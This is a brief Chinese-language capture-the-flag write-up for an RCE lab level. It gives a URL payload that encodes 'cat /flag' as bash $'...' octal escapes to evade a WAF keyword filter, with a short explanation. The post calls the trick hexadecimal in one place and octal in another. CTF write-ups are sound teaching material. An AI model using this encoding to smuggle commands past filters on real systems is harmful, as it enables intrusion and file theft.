RCE-labs-level9

iiice,2026-04-19 22:29

Plaintext

http://80-2860e31e-0f4a-4ba4-a01e-e1d704d63693.challenge.ctfplus.cn/?cmd=$'\143\141\164' $'\57\146\154\141\147'

本题考查了在bash下的16进制字符绕过，形如注释中：$'\xxx\xxx\xxx'(不要忘记加单引号！！！)

所以我们要执行cat /flag，只需要把cat和/flag转成八进制，再套上公式就可以通过八进制绕过waf。

暂无回复。你的想法是什么？

GeeSec

商务合作

图片隐写